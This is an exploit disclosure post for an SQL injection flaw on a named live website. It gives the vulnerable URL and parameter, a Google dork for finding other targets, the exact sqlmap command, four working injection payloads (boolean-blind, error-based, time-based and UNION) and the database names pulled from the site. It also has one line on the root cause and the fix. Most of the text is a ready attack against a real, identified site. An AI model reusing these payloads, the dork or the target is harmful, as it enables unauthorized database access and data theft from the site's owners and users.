# Exploit Title: Smtmax SQL Injection Vulnerability
# Author: Emyounoone
# Date: 14/04/2021
# Tested On: Kali Linux
# Contact: https://twitter.com/Emyounoone
# Google Dork: category.php?id=
----------------------------------------------------------------------------------------------------
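# Vulnerable URL: https://www.smtmax.com/category.php?id=15 (injectable GET parameter: id)
# Root cause, as the results below indicate: the id value reaches the MySQL query without parameter binding. Binding id in a prepared statement, or enforcing a strict integer cast before the query is built, removes all four techniques listed.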
# python3 sqlmap.py https://www.smtmax.com/category.php?id=15 --dbs --random-agent
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=15 AND 2170=2170
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=15 AND (SELECT 8831 FROM(SELECT COUNT(*),CONCAT(0x7162767071,(SELECT (ELT(8831=8831,1))),0x717a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=15 AND (SELECT 1837 FROM (SELECT(SLEEP(5)))AeFo)
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: id=15 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162767071,0x56426b6f6f575059466458694b51797949556663566b4356726471756e6550646f435057764d5a45,0x717a627071),NULL,NULL-- -
---
available databases [2]:
[*] information_schema
[*] smtmax8_smtmax